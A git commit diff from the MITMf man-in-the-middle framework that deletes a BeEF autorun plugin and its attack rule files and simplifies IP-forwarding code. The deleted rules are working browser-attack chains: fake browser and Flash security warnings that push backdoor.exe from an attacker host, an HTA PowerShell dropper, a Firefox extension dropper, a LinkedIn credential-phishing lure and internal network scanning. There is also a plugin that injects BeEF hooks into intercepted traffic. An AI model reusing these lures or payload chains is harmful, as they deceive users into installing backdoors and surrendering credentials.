Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine

removed check to enable IP forwarding using sysctl
byt3bl33d3r 2015-08-23 01:33:16 +02:00
parent 77fc00539e
commit 24070afbd0
11 changed files with 4 additions and 300 deletions


@ -1,35 +0,0 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "S",
"browser_version": ">= 7",
"os": "OSX",
"os_version": "<= 10.10",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}


@ -1,3 +0,0 @@
*
!.gitignore
!README


@ -1,2 +0,0 @@
Move here the ARE rule files that you want to load into BeEF.
Make sure they are .json files (any other file extension is ignored).


@ -1,20 +0,0 @@
{
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"browser_version": "ALL",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
"name": "firefox_extension_dropper",
"condition": null,
"options": {
"extension_name": "Ummeneske",
"xpi_name": "Ummeneske",
"base_host": "http://172.16.45.1:3000"
}
}],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}


@ -1,28 +0,0 @@
{"name": "Get Internal IP (WebRTC)",
"author": "antisnatchor",
"browser": "FF",
"browser_version": ">= 31",
"os": "Linux",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "internal_network_fingerprinting",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80",
"threads":"5",
"wait":"2",
"timeout":"10"
}
}
],
"execution_order": [0,1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}


@ -1,31 +0,0 @@
{
"name": "Ie Fake Notification + Clippy",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "== 11",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
}
}
,{
"name": "clippy",
"condition": null,
"options": {
"clippydir": "http://172.16.45.1:3000/clippy/",
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
"respawntime":"5000",
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
}
}
],
"execution_order": [0,1],
"execution_delay": [0,2000],
"chain_mode": "sequential"
}


@ -1,27 +0,0 @@
{
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "ALL",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
}
},
{
"name": "hta_powershell",
"condition": null,
"options": {
"domain":"http://172.16.45.1:3000",
"ps_url":"/ps"
}
}],
"execution_order": [0,1],
"execution_delay": [0,500],
"chain_mode": "sequential"
}


@ -1,27 +0,0 @@
{
"name": "Fake missing plugin + Pretty Theft LinkedIn",
"author": "antisnatchor",
"browser": "IE",
"browser_version": ">= 8",
"os": "Windows",
"os_version": "== XP",
"modules": [{
"name": "fake_notification_c",
"condition": null,
"options": {
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
}
}, {
"name": "pretty_theft",
"condition": null,
"options": {
"choice": "Windows",
"backing": "Grey",
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
}
}],
"execution_order": [0, 1],
"execution_delay": [0, 5000],
"chain_mode": "sequential"
}


@ -1,35 +0,0 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "<= 8",
"os": "Windows",
"os_version": ">= XP",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}


@ -21,7 +21,6 @@ import logging
import re import re
import sys import sys
from commands import getstatusoutput
from core.logger import logger from core.logger import logger
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
@ -35,15 +34,10 @@ def shutdown(message=None):
sys.exit(message) sys.exit(message)
def set_ip_forwarding(value): def set_ip_forwarding(value):
status, result = getstatusoutput('sysctl --help') log.debug("Setting ip forwarding to {}".format(value))
if status == 0: with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
log.debug("Setting ip forwarding to {} using sysctl".format(value)) file.write(str(value))
os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX file.close()
else:
log.debug("Setting ip forwarding to {}".format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def get_iface(): def get_iface():
iface = get_working_if() iface = get_working_if()
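Review bot: With the sysctl branch gone, `set_ip_forwarding` writes `/proc/sys/net/ipv4/ip_forward` unconditionally and does not handle the `IOError` that `open()` raises when that path is absent (the removed branch was commented `#for OSX`) or the process lacks write permission. The caller then gets a bare traceback and no log line saying whether this host-wide kernel setting was changed or restored. Catch the error, log it with the requested value and re-raise; whether exiting through `shutdown()` is the better reaction depends on callers outside this hunk. The `file.close()` inside the `with` block is redundant and `file` shadows the Python 2 builtin, so the sketch below drops both.

```python
def set_ip_forwarding(value):
    log.debug("Setting ip forwarding to {}".format(value))
    try:
        with open('/proc/sys/net/ipv4/ip_forward', 'w') as fwd:
            fwd.write(str(value))
    except IOError as e:
        log.error("Could not set ip forwarding to {}: {}".format(value, e))
        raise
```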


@ -1,82 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
import pyinotify
from plugins.plugin import Plugin
from plugins.inject import Inject
from core.beefapi import BeefAPI
class BeefAutorun(Inject, Plugin):
name = "BeEFAutoloader"
optname = "beefauto"
desc = "Injects BeEF hooks & manages BeEF's ARE rule loading"
version = "0.4"
def initialize(self, options):
self.options = options
self.ip_address = options.ip
beefconfig = self.config['MITMf']['BeEF']
Inject.initialize(self, options)
self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
beefconfig = self.config['MITMf']['BeEF']
from core.utils import shutdown
beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
if not beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
self.tree_info.append('Starting RuleWatcher')
RuleWatcher(beef, self.log).start()
def options(self, options):
pass
class RuleWatcher(pyinotify.ProcessEvent):
def __init__(self, beef, logger):
pyinotify.ProcessEvent.__init__(self)
self.beef = beef
self.log = logger
def process_IN_MODIFY(self, event):
self.log.debug('Detected ARE rule change!')
for rule in self.beef.are_rules.list():
self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
rule.delete()
if event.src_path.endswith('.json'):
self.log.debug('Detected ARE rule modification/addition!')
for rule in os.listdir('./config/beef_arerules/enabled'):
if rule.endswith('.json'):
rule_path = './config/beef_arerules/enabled/' + rule
self.log.debug('Adding rule {}'.format(rule_path))
self.beef.are_rules.add(rule_path)
def start(self):
wm = pyinotify.WatchManager()
wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY)
notifier = pyinotify.Notifier(wm, self)
t = threading.Thread(name='RuleWatcher', target=notifier.loop)
t.setDaemon(True)
t.start()